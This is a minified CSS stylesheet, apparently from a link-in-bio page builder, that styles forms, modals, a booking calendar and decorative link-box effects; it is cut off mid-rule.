span.spinner-grow{top:15px}.btn-opaque{background-color:rgba(255,255,255,.5)}.form-datalist{max-height:100px;overflow:hidden}ul.ui-autocomplete{z-index:1100}.shadow-selected{border-width:2px!important}.border-thicker-less{border-width:2px!important}.border-transparent{border-color:transparent!important}.shadow-selected{width:8px;height:8px;top:-1px}.profilepic-shadow{box-shadow:0 1px 2px rgb(0 0 0 / 12%),0 2px 4px rgb(0 0 0 / 12%),0 4px 8px rgb(0 0 0 / 12%),0 8px 16px rgb(0 0 0 / 12%),0 16px 32px rgb(0 0 0 / 12%)}.lighter-text{opacity:.6}.lighter-text-mid{opacity:.5}#LN_embed-type option{color:black}#consent{position:relative;top:2.5px}.btn-gotit:hover{background:transparent}.mh-300{max-height:300px;}.preline{white-space:pre-line}.modal-back{top:32px;left:19px;width:50px;padding-left:10px!important;text-align:left}@media (max-width:768px){.modal-action{position:absolute;top:32px;right:29px}}@media (min-width:768px){.modal-action{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%)}}.modal-header .close{opacity:1!important}@media (max-width:768px){.modal-header:not(.modal-header-fullscreen) .close{display:none!important}}.modal-header-bar{top:8px;left:50%;width:30px;margin-left:-15px;height:5px;border-radius:2.5px}.modal-fullscreen .modal-header-bar{display:none!important}.autocrop{object-fit:contain}@media (min-width:768px){.modal-back{position:initial!important;margin-right:15px!important}}.col-reduced{flex:0 0 18%;max-width:18%}@media (min-width:768px){.col-reduced{flex:0 0 14.28%;max-width:14.28%}}.correcttop{top:-1px}.mw-200{max-width:200px}.mw-150{max-width:150px}.input_currency_symbol{position:relative}.input_currency_symbol span{position:absolute;top:50%;transform:translate(0,-50%);pointer-events:none;width:40px;text-align:center;font-style:normal;display:block}.input_currency_symbol>input.form-control{padding-left:3rem}.form-control{border-radius:23px;height:46px;padding-left:1.2rem;padding-right:1.2rem;font-size:16px}.btn-pagnottona{padding:.5rem 1rem;height:46px;text-align:center;border-radius:26.5px;text-transform:none}a.btn-pagnottona{padding-top:.7rem;padding-bottom:.3rem}.action-confirmation{position:relative;top:4px}.pb-links .pb-linkbox .embed-image-logo{height:auto!important}.pb-links .pb-linkbox .embed-image-logo div{width:100%;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);border-radius:0!important}.pb-links .pb-linkbox .embed-image-logo div i{position:relative;top:2.5px}.btn-outline-milka:hover{color:white!important}.ui-state-highlight{min-height:20px}.input-group>.form-control:not(:last-child).no-squared{border-top-right-radius:23px;border-bottom-right-radius:23px}@media (min-width:768px){.pb-desktop-grid-instagram-nomargs .pb-linkimage.d-none,.pb-desktop-grid-instagram .pb-linkimage.d-none,.pb-desktop-grid-sqr-notit .pb-linkimage.d-none,.pb-desktop-grid-rec-notit .pb-linkimage.d-none{display:block!important}}@media (max-width:768px){.pb-desktop-grid-instagram-nomargs .pb-linkimage.d-none,.pb-mobile-grid-instagram .pb-linkimage.d-none,.pb-mobile-grid-sqr-notit .pb-linkimage.d-none,.pb-mobile-grid-rec-notit .pb-linkimage.d-none{display:block!important}}.absolute0{top:0;left:0}@media (min-width:768px){.absolute01{top:3px;left:6px;right:4px;bottom:2px}}@media (max-width:768px){.absolute01{top:2px;left:3px;right:1px;bottom:2px}}.absolute-center{top:50%;left:50%;transform:translate(-50%,-50%)}.double-border{border-width:1px!important}.page-bg{background-position:top left!important;object-fit:contain;padding-top:0!important;padding-bottom:0!important;min-height:auto!important;background-attachment:initial!important}.btn-page-action{width:67px;height:67px;border-radius:50%}.btn-page-action i{position:relative;left:1px;top:1px}.shopimg{max-width:300px;max-height:300px}.selectwrap{position:relative;float:left}.selectwrap select{appearance:none;-webkit-appearance:none;-moz-appearance:none;text-overflow:'';padding-right:30px}.selectwrap:after{content:"\f078";font-family:"Font Awesome 5 Pro";text-align:center;line-height:32px;position:absolute;background:transparent;right:8px;top:8px;pointer-events:none}.xs-positioned{position:relative;top:-11px}.xs-heighed:not(.height-PLAN_FREE){height:60px}.xs-corrector .card-body:not(.card-PLAN_FREE){padding-top:7px!important;padding-bottom:7px!important}.modal-price-top{top:-20px}.payment-mobile-container .bg-newgray{visibility:hidden!important}.pt-01{padding-top:1px}.menu-arrow{position:relative;top:2px}.no-bold{font-weight:normal!important}.fix-vertical-icon{left:5px;top:-1px}.square-shape{content:"";display:block;padding-bottom:100%;position:relative;background-size:cover}.square-content{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%)}#pb_cookie_consent{position:fixed;box-sizing:border-box;z-index:9999999;bottom:0;left:0}.fix-pagnottona{padding-top:9px}.nav-tabs .nav-link.active{border-color:var(--milka);border-width:3px}.form-check .custom-control-label::before{width:1.4rem;height:1.4rem}.form-check .custom-control-label::after{width:1.4rem;height:1.4rem}.form-check .custom-control-input{width:1.4rem;height:1.65rem}.newsletter-signup .card.lnkbio-boxcolor{border-width:.5px!important}.newsletter-signup .custom-control-label::before{width:1.2rem;height:1.2rem}.newsletter-signup .custom-control-label::after{width:1.2rem;height:1.2rem}.newsletter-signup .custom-control-input{width:1.2rem;height:1.45rem}.lnkbio-boxcolor.border-thinner{border-width:1px!important}.btn-standalone{border-radius:31px!important;height:64px!important}.newsletter_container td,.contactform_container td{padding-top:1.25rem;padding-bottom:1.25rem}.newsletter_table thead th,.contactform_table thead th{border-bottom:2px solid #dee2e6;border-top:0;padding-bottom:1.5rem}.fix-row-features{margin-top:2px}.fix-padding-icons{padding-top:7px}#share_button{position:absolute;top:10px;left:15px}.share-profilepic{width:48px;height:48px;border-radius:50%}.frosted{-webkit-backdrop-filter:blur(3px);backdrop-filter:blur(3px);background-color:rgba(255,255,255,.4)}.mr-4_5{margin-right:1.7rem}.tox-statusbar__branding{display:none!important}.z-2{z-index:2}.z-3{z-index:3}.btn-add-link-between{width:30px;height:30px}@media (min-width:768px){}@media (max-width:768px){.pb-links:not(.ml-LAYOUT_LIST_SMALL_SQR,.ml-LAYOUT_LIST_SMALL_RND,.ml-LAYOUT_LIST_LARGE_SQR,.ml-LAYOUT_LIST_LARGE_REC) .add-link-between-container{position:relative!important;left:-15px;margin:0!important;z-index:3;top:10px}.pb-links:not(.ml-LAYOUT_LIST_SMALL_SQR,.ml-LAYOUT_LIST_SMALL_RND,.ml-LAYOUT_LIST_LARGE_SQR,.ml-LAYOUT_LIST_LARGE_REC) .add-link-between-container .btn-add-link-between{position:absolute!important;left:0;top:0}.ml-LAYOUT_INSTAGRAM_NOMARG{margin-left:-18px!important;margin-right:-18px!important}}.map-responsive{overflow:hidden;padding-bottom:56.25%;position:relative;height:0}.map-responsive iframe{left:0;top:0;height:100%;width:100%;position:absolute}.zindex-2{z-index:2}.zindex-3{z-index:3}.g-recaptcha>div{margin:0 auto}.input-group-rounded .input-group-append{border-top-right-radius:23px;border-bottom-right-radius:23px}.input-group-rounded .form-control{border-right:0}.input-group-rounded-pre .input-group-prepend .input-group-text{border-top-left-radius:23px;border-bottom-left-radius:23px;border-right:0}.input-group-rounded-pre .form-control{border-left:0}.LN_locked{top:50%;right:10px;transform:translateY(-50%);z-index:3;width:26px;height:26px;text-align:center}.LN_locked i{position:relative;top:3px;left:1px}.ptfix-2{padding-top:2px}.group-title-collapse-toggle{cursor:pointer}.lb-input-helper{top:50%;transform:translateY(-50%);right:10px}input:checked+.slider.slider_milka{background-color:var(--milka)}input:focus+.slider{box-shadow:0 0 0 var(--milka);}.input-group .lb-input{position:relative;flex:1 1 auto;width:1%;min-width:0;margin-bottom:0}.input-group .lb-input input.form-control{border-top-left-radius:0;border-bottom-left-radius:0}.form-control:focus{border-color:var(--milka);box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(185,150,247,.6)}.fix-label-shorturl{position:relative;top:4px}.nav-tabs .nav-link.active,.nav-tabs .nav-item.show .nav-link{background-color:transparent}.alert-light{background-color:transparent}.list-group-item{background-color:transparent}.card{background-color:transparent}.text-newmilka{color:var(--newmilka)!important}.fix-menu-agency-profile{position:relative;top:-1px}.fix-menu-agency-profile img{border-radius:50%}a.login-button.bg-white:hover,a.login-button.bg-white:focus{border-color:var(--milka);background-color:white!important}footer h6{text-transform:uppercase}.btn-outline-boostrapgrey:hover{color:white!important}.popover .popover-body{padding:20px 30px}.popover .popover-body a{display:block}.language-choice i.fa-language{position:relative;top:2px}footer h4{text-transform:uppercase;line-height:28px}footer{color:black}footer a{color:#333}footer a:hover{color:var(--darkmilka)}footer .align-items-end{color:#333}@media (max-width:768px){.modal-content{border:0}}.CAL_Calendar .ui-datepicker-inline,.CAL_Calendar .ui-datepicker-calendar{width:100%!important}.CAL_Calendar .ui-state-default,.CAL_Calendar .ui-widget-content .ui-state-default,.CAL_Calendar .ui-widget-header .ui-state-default,.CAL_Calendar .ui-button,html .CAL_Calendar .ui-button.ui-state-disabled:hover,html .CAL_Calendar .ui-button.ui-state-disabled:active{background:transparent!important;border-color:transparent!important;text-align:center}.CAL_Calendar a.ui-state-default,.CAL_Calendar .ui-widget-content a.ui-state-default{position:relative;opacity:.99!important;color:white!important}.CAL_Calendar a.ui-state-default::after,.CAL_Calendar .ui-widget-content a.ui-state-default::after{content:'';display:block;width:34px;height:34px;background-color:#B996F7!important;position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);border-radius:50%;z-index:-1;opacity:.99}.CAL_Calendar .ui-widget-header{background-color:transparent!important;border-color:transparent!important}.CAL_Calendar .ui-datepicker .ui-datepicker-next span.ui-icon,.CAL_Calendar .ui-datepicker .ui-datepicker-prev span.ui-icon{display:none}.CAL_Calendar .ui-datepicker .ui-datepicker-next::before,.CAL_Calendar .ui-datepicker .ui-datepicker-prev::before{font-family:"Font Awesome 5 Pro";font-weight:900;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1;position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);font-size:16px!important}.CAL_Calendar .ui-datepicker .ui-datepicker-next::before{content:"\f054"}.CAL_Calendar .ui-datepicker .ui-datepicker-prev::before{content:"\f053"}.CAL_Calendar .ui-datepicker .ui-datepicker-prev{left:auto!important;right:30px!important}.CAL_Calendar .ui-datepicker-header{margin-bottom:0!important;margin-top:10px!important}.CAL_Calendar .ui-widget.ui-widget-content{border:0!important}.CAL_Calendar .ui-state-default{font-size:16px!important}.CAL_Calendar .ui-datepicker td{padding-bottom:10px!important}.CAL_Calendar .ui-datepicker-month,.CAL_Calendar .ui-datepicker-year{font-size:16px!important}.CAL_inputLike{height:46px;width:100%;border-radius:23px;padding-top:.375rem;padding-bottom:.375rem;padding-left:1.2rem;padding-right:1.2rem;font-size:16px;border:1px solid #ced4da;color:#495057}.CAL_inputLike *{font-size:16px}.CAL_Calendar .ui-datepicker th{font-weight:normal!important}.CAL_Calendar .ui-datepicker .ui-datepicker-title{text-align:left!important;margin-left:10px!important}.CAL_calIcon{width:16px;height:16px;display:inline-block;border-radius:50%;position:relative;top:3px;margin-right:5px}.CAL_Calendar .ui-state-disabled,.CAL_Calendar .ui-widget-content .ui-state-disabled,.CAL_Calendar .ui-widget-header .ui-state-disabled{opacity:.6!important}.CAL_Calendar .ui-widget-content{background:transparent!important}.CAL_Calendar .ui-widget-content{border:0;background:transparent}.CAL_Calendar .ui-state-default,.CAL_Calendar .ui-widget-content .ui-state-default,.CAL_Calendar .ui-widget-header .ui-state-default,.CAL_Calendar .ui-button,html .CAL_Calendar .ui-button.ui-state-disabled:hover,html .CAL_Calendar .ui-button.ui-state-disabled:active{border:0!important}#PB_CalendarModal .modal-body{overflow-y:auto;max-height:80vh}#PB_CalendarModal .btn-close{display:block!important}#PB_CalendarModal.modal .modal-header .fa-times:before{content:"\f00d"!important}.menu-new-indication{right:0;top:-9px}#navbar-secondary .menu-new-indication{right:-20px}.pagnottona-sqr{border-radius:.25rem!important}.btn-cta:hover{background-image:linear-gradient(63deg,rgba(192,255,248,1) 0,rgba(227,211,255,1) 80%);border:solid 4px transparent;background-origin:border-box;box-shadow:4px 1000px 1px #fff inset;color:#3D4043}.btn-cta{background-image:linear-gradient(63deg,rgba(192,255,248,1) 0,rgba(227,211,255,1) 80%);background-origin:border-box;box-shadow:none;border:solid 4px transparent;color:#3D4043;border-radius:35.5px}.font-weight-thin{font-weight:100}.border-stripe{border-color:#635bff!important}.border-paypal{border-color:#ffc439!important}.CAL_selectPricing{border-width:3px!important}.btn-squared-custom{border-radius:4px!important;width:100%!important;height:47px!important;font-size:16px!important;font-weight:500!important;text-transform:none!important;border-width:2px!important}@media (min-width:768px){.btn-squared-custom{height:55px!important}}.rounded-alot{border-radius:34px!important}.border-thicker{border-width:3px!important}textarea.text-high{height:150px}.hm-200{max-height:150px;object-fit:cover;object-position:bottom}.rounded-highest{border-radius:24px}.ctn_val{line-height:60px}.custom-file{height:46px;border-radius:20px}.custom-file-label{line-height:35px;height:46px;border-radius:inherit}.custom-file-label::after{top:-1px;right:-1px;height:46px;line-height:35px;border-top-right-radius:20px;border-bottom-right-radius:20px;border:1px solid #ced4da}.bg-calendar-shade-1{background-color:#F80645}.bg-calendar-shade-2{background-color:#FE641C}.bg-calendar-shade-3{background-color:#FEE929}.bg-calendar-shade-4{background-color:#50EC11}.bg-calendar-shade-5{background-color:#3576FF}.bg-calendar-shade-6{background-color:#B34DFF}.border-calendar-shade-1{border-color:#F80645!important}.border-calendar-shade-2{border-color:#FE641C!important}.border-calendar-shade-3{border-color:#FEE929!important}.border-calendar-shade-4{border-color:#50EC11!important}.border-calendar-shade-5{border-color:#3576FF!important}.border-calendar-shade-6{border-color:#B34DFF!important}.effect-noborder .pb-linkbox-inner{border:0!important}.effect-shadow{padding-left:0;padding-right:12px}.effect-shadow .pb-linkbox{margin-bottom:20px!important}@media (max-width:768px){.effect-shadow .pb-mobile-grid-instagram-nomargs,.effect-shadow .pb-mobile-grid-instagram,.effect-shadow .pb-mobile-grid-sqr-notit,.effect-shadow .pb-mobile-grid-vertical-title,.effect-shadow .pb-mobile-grid-vertical-notitle,.effect-shadow .pb-mobile-grid-rec-notit,.effect-shadow .pb-mobile-grid-sqr-title,.effect-shadow .pb-mobile-grid-rec-title,.effect-shadow .pb-mobile-grid-old-title{padding-right:10px!important;padding-left:10px!important}}@media (min-width:768px){.effect-shadow .pb-desktop-grid-instagram-nomargs,.effect-shadow .pb-desktop-grid-instagram,.effect-shadow .pb-desktop-grid-sqr-notit,.effect-shadow .pb-desktop-grid-rec-notit,.effect-shadow .pb-desktop-grid-sqr-title,.effect-shadow .pb-desktop-grid-vertical-title,.effect-shadow .pb-desktop-grid-vertical-notitle,.effect-shadow .pb-desktop-grid-rec-title,.effect-shadow .pb-desktop-grid-old-title{padding-right:10px!important;padding-left:10px!important}}.effect-shadow .pb-linkbox-inner{box-shadow:#3D4043 10px 10px 0 0}.effect-striped{padding-left:0}.effect-striped .pb-linkbox{margin-bottom:20px!important}@media (max-width:768px){.effect-striped .pb-mobile-grid-sqr-notit .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-vertical-title .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-vertical-notitle .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-instagram .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-instagram-nomargs .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-rec-notit .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-sqr-title .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-rec-title .pb-linkbox-inner::before,.effect-striped .pb-mobile-grid-old-title .pb-linkbox-inner::before,.effect-striped .pb-mobile-list-large-sqr .pb-linkbox-inner::before{bottom:-12px;left:-2px;right:-2px}.effect-striped .pb-mobile-list-large-rec .pb-linkbox-inner::before,.effect-striped .pb-mobile-list-large-old .pb-linkbox-inner::before{bottom:-12px;left:0;right:0}.effect-striped .pb-mobile-grid-sqr-notit .pb-linkbox-inner,.effect-striped .pb-mobile-grid-vertical-title .pb-linkbox-inner,.effect-striped .pb-mobile-grid-vertical-notitle .pb-linkbox-inner,.effect-striped .pb-mobile-grid-instagram .pb-linkbox-inner,.effect-striped .pb-mobile-grid-instagram-nomargs .pb-linkbox-inner,.effect-striped .pb-mobile-grid-rec-notit .pb-linkbox-inner,.effect-striped .pb-mobile-grid-sqr-title .pb-linkbox-inner,.effect-striped .pb-mobile-grid-rec-title .pb-linkbox-inner,.effect-striped .pb-mobile-grid-old-title .pb-linkbox-inner{position:relative}}@media (min-width:768px){.effect-striped .pb-desktop-grid-sqr-notit .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-instagram .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-instagram-nomargs .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-rec-notit .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-sqr-title .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-vertical-title .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-vertical-notitle .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-rec-title .pb-linkbox-inner::before,.effect-striped .pb-desktop-grid-old-title .pb-linkbox-inner::before,.effect-striped .pb-desktop-list-large-sqr .pb-linkbox-inner::before{bottom:-12px;left:-2px;right:-2px}.effect-striped .pb-desktop-list-large-rec .pb-linkbox-inner::before,.effect-striped .pb-desktop-list-large-old .pb-linkbox-inner::before{bottom:-12px;left:-1px;right:0}.effect-striped .pb-desktop-grid-sqr-notit .pb-linkbox-inner,.effect-striped .pb-desktop-grid-instagram .pb-linkbox-inner,.effect-striped .pb-desktop-grid-instagram-nomargs .pb-linkbox-inner,.effect-striped .pb-desktop-grid-rec-notit .pb-linkbox-inner,.effect-striped .pb-desktop-grid-sqr-title .pb-linkbox-inner,.effect-striped .pb-desktop-grid-vertical-title .pb-linkbox-inner,.effect-striped .pb-desktop-grid-vertical-notitle .pb-linkbox-inner,.effect-striped .pb-desktop-grid-rec-title .pb-linkbox-inner,.effect-striped .pb-desktop-grid-old-title .pb-linkbox-inner{position:relative}}@media (max-width:768px){.effect-striped .pb-mobile-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important}}@media (min-width:768px){.effect-striped .pb-desktop-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important}.effect-striped .pb-linkbox-inner::before{bottom:-10px!important;left:-2px!important;right:-2px!important}}.effect-striped .pb-linkbox-inner::before{content:'';position:absolute;left:2px;top:6px;right:2px;bottom:-6px;background:repeating-linear-gradient(45deg,transparent 0,transparent 2px,#3D4043 2px,#3D4043 4px);border-radius:4px!important;z-index:-1;border:2px solid #3D4043}.effect-progress .pb-linkbox{margin-bottom:20px!important}@media (max-width:768px){.effect-progress .pb-mobile-grid-sqr-notit .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-vertical-title .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-vertical-notitle .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-rec-notit .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-sqr-title .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-rec-title .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-old-title .pb-linkbox-inner::before,.effect-progress .pb-mobile-list-large-sqr .pb-linkbox-inner::before{bottom:-12px;left:-2px;right:-2px}.effect-progress .pb-mobile-grid-instagram-nomargs .pb-linkbox-inner::before,.effect-progress .pb-mobile-grid-instagram .pb-linkbox-inner::before{bottom:-12px;left:2px;right:2px}.effect-progress .pb-mobile-list-large-rec .pb-linkbox-inner::before,.effect-progress .pb-mobile-list-large-old .pb-linkbox-inner::before{bottom:-12px;left:0;right:0}.effect-progress .pb-mobile-grid-sqr-notit .pb-linkbox-inner,.effect-progress .pb-mobile-grid-vertical-notitle .pb-linkbox-inner,.effect-progress .pb-mobile-grid-vertical-title .pb-linkbox-inner,.effect-progress .pb-mobile-instagram .pb-linkbox-inner,.effect-progress .pb-mobile-grid-rec-notit .pb-linkbox-inner,.effect-progress .pb-mobile-grid-sqr-title .pb-linkbox-inner,.effect-progress .pb-mobile-grid-rec-title .pb-linkbox-inner,.effect-progress .pb-mobile-grid-old-title .pb-linkbox-inner{position:relative}}@media (min-width:768px){.effect-progress .pb-desktop-grid-sqr-notit .pb-linkbox-inner,.effect-progress .pb-desktop-instagram .pb-linkbox-inner,.effect-progress .pb-desktop-grid-rec-notit .pb-linkbox-inner,.effect-progress .pb-desktop-grid-sqr-title .pb-linkbox-inner,.effect-progress .pb-desktop-grid-vertical-title .pb-linkbox-inner,.effect-progress .pb-desktop-grid-vertical-notitle .pb-linkbox-inner,.effect-progress .pb-desktop-grid-rec-title .pb-linkbox-inner,.effect-progress .pb-desktop-grid-old-title .pb-linkbox-inner{position:relative}.effect-progress .pb-desktop-grid-sqr-notit .pb-linkbox-inner::before,.effect-progress .pb-desktop-instagram .pb-linkbox-inner::before,.effect-progress .pb-desktop-grid-rec-notit .pb-linkbox-inner::before,.effect-progress .pb-desktop-grid-sqr-title .pb-linkbox-inner::before,.effect-progress .pb-desktop-grid-vertical-title .pb-linkbox-inner::before,.effect-progress .pb-desktop-grid-vertical-notitle .pb-linkbox-inner::before,.effect-progress .pb-desktop-grid-rec-title .pb-linkbox-inner::before,.effect-progress .pb-desktop-grid-old-title .pb-linkbox-inner::before,.effect-progress .pb-desktop-list-large-sqr .pb-linkbox-inner::before{bottom:-12px;left:-2px;right:-2px}.effect-progress .pb-desktop-list-large-rec .pb-linkbox-inner::before,.effect-progress .pb-desktop-list-large-old .pb-linkbox-inner::before{bottom:-12px;left:-1px;right:0}}@media (max-width:768px){.effect-progress .pb-mobile-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important;top:4px;background:repeating-linear-gradient(45deg,#FFC9ED 0,#FFC9ED 7.7%,#FFF 7.7%,#FFF 15.4%,#BFF9FE 15.4%,#BFF9FE 23.1%,#A7684B 23.1%,#A7684B 30.8%,#3D4043 30.8%,#3D4043 38.5%,#f04166 38.5%,#f04166 46.2%,#FA7539 46.2%,#FA7539 53.9%,#FFE85F 53.9%,#FFE85F 61.6%,#01C8A7 61.6%,#01C8A7 69.3%,#4E98FF 69.3%,#4E98FF 77%,#B996F7 77%,#B996F7 100%)}}@media (min-width:768px){.effect-progress .pb-desktop-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important;top:4px;background:repeating-linear-gradient(45deg,#FFC9ED 0,#FFC9ED 7.7%,#FFF 7.7%,#FFF 15.4%,#BFF9FE 15.4%,#BFF9FE 23.1%,#A7684B 23.1%,#A7684B 30.8%,#3D4043 30.8%,#3D4043 38.5%,#f04166 38.5%,#f04166 46.2%,#FA7539 46.2%,#FA7539 53.9%,#FFE85F 53.9%,#FFE85F 61.6%,#01C8A7 61.6%,#01C8A7 69.3%,#4E98FF 69.3%,#4E98FF 77%,#B996F7 77%,#B996F7 100%)}.effect-progress .pb-linkbox-inner::before{bottom:-10px!important;left:-2px!important;right:-2px!important}}.effect-progress .pb-linkbox-inner::before{content:'';position:absolute;left:2px;top:90%;top:calc(100% - 10px);right:2px;bottom:-6px;background:repeating-linear-gradient(45deg,#FFC9ED 0,#FFC9ED 9.1%,#FFF 9.1%,#FFF 18.2%,#BFF9FE 18.2%,#BFF9FE 27.3%,#A7684B 27.3%,#A7684B 36.4%,#3D4043 36.4%,#3D4043 45.5%,#f04166 45.5%,#f04166 54.6%,#FA7539 54.6%,#FA7539 63.7%,#FFE85F 63.7%,#FFE85F 72.8%,#01C8A7 72.8%,#01C8A7 81.9%,#4E98FF 81.9%,#4E98FF 91%,#B996F7 91%,#B996F7 100%);border:2px solid black;z-index:-1}.effect-neon{padding-left:4px;padding-right:4px}@media (max-width:768px){.ml-LAYOUT_LIST_LARGE_REC.effect-neon,.ml-LAYOUT_LIST_LARGE_SQR.effect-neon,.ml-LAYOUT_LIST_SMALL_RND.effect-neon,.ml-LAYOUT_LIST_SMALL_SQR.effect-neon{padding-left:14px;padding-right:14px}.effect-neon .pb-mobile-list-large-rec .pb-linktitle,.effect-neon .pb-mobile-list-large-sqr .pb-linktitle{padding-left:0!important;padding-right:0!important}}@media (min-width:768px){.dl-LAYOUT_LIST_LARGE_REC.effect-neon,.dl-LAYOUT_LIST_LARGE_SQR.effect-neon,.dl-LAYOUT_LIST_SMALL_RND.effect-neon,.dl-LAYOUT_LIST_SMALL_SQR.effect-neon{padding-left:14px;padding-right:14px}.effect-neon .pb-desktop-list-large-rec .pb-linktitle,.effect-neon .pb-desktop-list-large-sqr .pb-linktitle{padding-left:0!important;padding-right:0!important}}.effect-neon .pb-linkbox{margin-top:15px!important;margin-bottom:15px!important}@media (max-width:768px){.effect-neon .pb-mobile-grid-sqr-notit,.effect-neon .pb-mobile-grid-vertical-notitle,.effect-neon .pb-mobile-grid-vertical-title,.effect-neon .pb-mobile-instagram,.effect-neon .pb-mobile-grid-rec-notit,.effect-neon .pb-mobile-grid-sqr-title,.effect-neon .pb-mobile-grid-rec-title,.effect-neon .pb-mobile-grid-old-title{padding-right:10px!important;padding-left:10px!important}.effect-neon .pb-mobile-grid-sqr-notit .pb-linkbox-inner,.effect-neon .pb-mobile-grid-vertical-notitle .pb-linkbox-inner,.effect-neon .pb-mobile-grid-vertical-title .pb-linkbox-inner,.effect-neon .pb-mobile-instagram .pb-linkbox-inner,.effect-neon .pb-mobile-grid-rec-notit .pb-linkbox-inner,.effect-neon .pb-mobile-grid-sqr-title .pb-linkbox-inner,.effect-neon .pb-mobile-grid-rec-title .pb-linkbox-inner,.effect-neon .pb-mobile-grid-old-title .pb-linkbox-inner{position:relative}.effect-neon .pb-mobile-list-large-sqr .pb-linkimage img,.effect-neon .pb-mobile-list-large-rec .pb-linkimage img,.effect-neon .pb-mobile-grid-sqr-notit .pb-linkimage img,.effect-neon .pb-mobile-grid-vertical-notitle .pb-linkimage img,.effect-neon .pb-mobile-grid-vertical-title .pb-linkimage img,.effect-neon .pb-mobile-instagram .pb-linkimage img,.effect-neon .pb-mobile-grid-rec-notit .pb-linkimage img,.effect-neon .pb-mobile-grid-sqr-title .pb-linkimage img,.effect-neon .pb-mobile-grid-rec-title .pb-linkimage img,.effect-neon .pb-mobile-grid-old-title .pb-linkimage img{border-radius:4px}}@media (min-width:768px){.effect-neon .pb-desktop-grid-sqr-notit,.effect-neon .pb-desktop-instagram,.effect-neon .pb-desktop-grid-rec-notit,.effect-neon .pb-desktop-grid-sqr-title,.effect-neon .pb-desktop-grid-vertical-title,.effect-neon .pb-desktop-grid-vertical-notitle,.effect-neon .pb-desktop-grid-rec-title,.effect-neon .pb-desktop-grid-old-title{padding-right:10px!important;padding-left:10px!important}.effect-neon .pb-desktop-grid-sqr-notit .pb-linkbox-inner,.effect-neon .pb-desktop-instagram.pb-linkbox-inner,.effect-neon .pb-desktop-grid-rec-notit .pb-linkbox-inner,.effect-neon .pb-desktop-grid-sqr-title .pb-linkbox-inner,.effect-neon .pb-desktop-grid-vertical-title .pb-linkbox-inner,.effect-neon .pb-desktop-grid-vertical-notitle .pb-linkbox-inner,.effect-neon .pb-desktop-grid-rec-title .pb-linkbox-inner,.effect-neon .pb-desktop-grid-old-title .pb-linkbox-inner{position:relative}.effect-neon .pb-desktop-list-large-sqr .pb-linkimage img,.effect-neon .pb-desktop-list-large-rec .pb-linkimage img,.effect-neon .pb-desktop-grid-sqr-notit .pb-linkimage img,.effect-neon .pb-desktop-instagram .pb-linkimage img,.effect-neon .pb-desktop-grid-rec-notit .pb-linkimage img,.effect-neon .pb-desktop-grid-sqr-title .pb-linkimage img,.effect-neon .pb-desktop-grid-vertical-title .pb-linkimage img,.effect-neon .pb-desktop-grid-vertical-notitle .pb-linkimage img,.effect-neon .pb-desktop-grid-rec-title .pb-linkimage img,.effect-neon .pb-desktop-grid-old-title .pb-linkimage img{border-radius:4px}}@media (min-width:768px){.effect-neon .pb-desktop-list-small-rnd .pb-linkbox-inner::before,.effect-neon .pb-desktop-list-small-rnd .pb-linkbox-inner::after{border-radius:33px!important}}@media (max-width:768px){.effect-neon .pb-mobile-list-small-rnd .pb-linkbox-inner::before,.effect-neon .pb-mobile-list-small-rnd .pb-linkbox-inner::after{border-radius:33px!important}}.effect-neon .pb-linkbox-inner{border:0 solid white!important}.effect-neon .pb-linkbox-inner::before{content:'';position:absolute;left:2px;top:2px;bottom:2px;right:2px;z-index:-2;box-shadow:0 0 1px 5px #fff,0 0 10px 5px #ff10f0,0 0 9px 2px #ff10f0;border-radius:4px!important}.effect-neon .pb-linkbox-inner::after{content:'';position:absolute;background-color:white;left:1px;top:1px;bottom:1px;right:1px;z-index:-1;border-radius:4px!important}.effect-oldvideo{padding-left:0;padding-right:0}.effect-oldvideo .pb-linkbox{margin-bottom:10px!important}.effect-oldvideo .pb-linkbox-inner{border-bottom-color:#f0f;border-right-color:#f0f;border-left-color:#0ff;border-top-color:#0ff;border-width:4px;border-style:solid}@media (max-width:768px){.effect-oldvideo .pb-mobile-grid-sqr-notit,.effect-oldvideo .pb-mobile-grid-vertical-notitle,.effect-oldvideo .pb-mobile-grid-vertical-title,.effect-oldvideo .pb-mobile-instagram,.effect-oldvideo .pb-mobile-grid-rec-notit,.effect-oldvideo .pb-mobile-grid-sqr-title,.effect-oldvideo .pb-mobile-grid-rec-title,.effect-oldvideo .pb-mobile-grid-old-title{padding-right:8px!important;padding-left:8px!important}.effect-oldvideo .pb-mobile-grid-sqr-notit .pb-linkbox-inner,.effect-oldvideo .pb-mobile-grid-vertical-title .pb-linkbox-inner,.effect-oldvideo .pb-mobile-grid-vertical-notitle .pb-linkbox-inner,.effect-oldvideo .pb-mobile-instagram .pb-linkbox-inner,.effect-oldvideo .pb-mobile-grid-rec-notit .pb-linkbox-inner,.effect-oldvideo .pb-mobile-grid-sqr-title .pb-linkbox-inner,.effect-oldvideo .pb-mobile-grid-rec-title .pb-linkbox-inner,.effect-oldvideo 